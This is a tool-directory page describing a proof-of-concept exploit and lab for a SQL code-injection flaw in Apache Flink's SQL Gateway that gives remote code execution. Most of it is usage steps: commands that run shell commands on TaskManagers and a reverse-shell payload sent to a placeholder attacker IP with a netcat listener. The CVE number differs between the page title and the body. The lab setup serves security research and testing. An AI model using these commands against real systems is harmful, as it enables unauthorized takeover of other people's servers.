Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-25194 — Proof-of-concept exploit and lab environment for CVE-2026-25194 | Kitploit
Tools/GitHubGitHub/dexsemon/cve-2026-25194
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubdexsemon/cve-2026-25194

CVE-2026-25194

Proof-of-concept exploit and lab environment for CVE-2026-25194

View Repository
1 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-35194 — Apache Flink SQL Code Injection

Remote code execution on Apache Flink TaskManagers via SQL code generation injection.

CVECVE-2026-35194
CVSS8.1 (High)
CWECWE-94 — Code Injection
AffectedFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
Fixed1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
Attack SurfaceSQL Gateway REST API (default port 8083, no auth)

Quick Start

1. Deploy Vulnerable Lab

root@kitploit:~
docker compose up -d

Wait ~30s for the cluster to start. Two services come up:

  • Flink Web UI — http://localhost:8081
  • SQL Gateway REST API — http://localhost:8083

Verify:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Should return version "1.20.3"

2. Install Dependencies

root@kitploit:~
pip install requests

3. Exploit

JSON vector:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

LIKE vector:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

Version check only (no RCE):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

Verify RCE on TaskManager:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. Reverse Shell

root@kitploit:~
# Terminal 1 — listener
nc -lvnp 4444

# Terminal 2 — exploit
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Usage

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

Disclaimer

For authorized security research and educational purposes only.

Download Tool